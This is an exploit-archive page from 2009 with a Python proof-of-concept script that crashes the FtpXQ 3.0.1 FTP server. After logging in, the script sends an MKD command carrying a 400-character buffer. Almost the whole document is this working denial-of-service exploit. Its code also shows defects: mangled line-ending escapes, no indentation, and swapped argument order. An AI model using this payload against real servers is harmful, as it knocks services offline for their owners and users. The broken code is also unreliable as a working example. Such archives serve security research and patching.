[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : FtpXQ authenticated remote Dos
# Published : 2009-11-17
# Author : Marc Doudiet
# Previous Title : Avast 4.8.1351.0 antivirus aswMon2.sys Kernel Memory Corruption
# Next Title : Novell eDirectory HTTPSTK Login Stack Overflow Vulnerability
#!/usr/bin/python
banner=(
"*************************rn"
"* Exploit Title: FtpXQ authenticated remote Dos "
"* (trial on http://www.datawizard.net/Products/FtpXQ/Setup.EXE) Version 3.0.1 rn"
"* Tested on XP sp2 english"
"* Needs write access --> vuln on MKD commandrn"
"* Vulnerability found by Marc Doudietrn"
"* For educational purpose onlyrn"
"* Proof of concept codern")
import socket
import sys
def Usage():
print ("Usage: ./ftpxq.py <Username> <password> <host>n")
string="A"*400
def start(username, password, hostname):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print banner
try:
s.connect((hostname, 21))
print "[-] Connecting to the FTP ..."
except:
print ("[-] Connection error!")
sys.exit(1)
s.recv(1024)
s.send('USER '+username+'rn')
s.recv(1024)
s.send('PASS '+password+'rn')
s.recv(1024)
print "[-] Sending evil buffer ...rn"
s.send('MKD '+string+'rn')
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
start(hostname,username,passwd)
print "[-] Exploit seems to work"
sys.exit(0)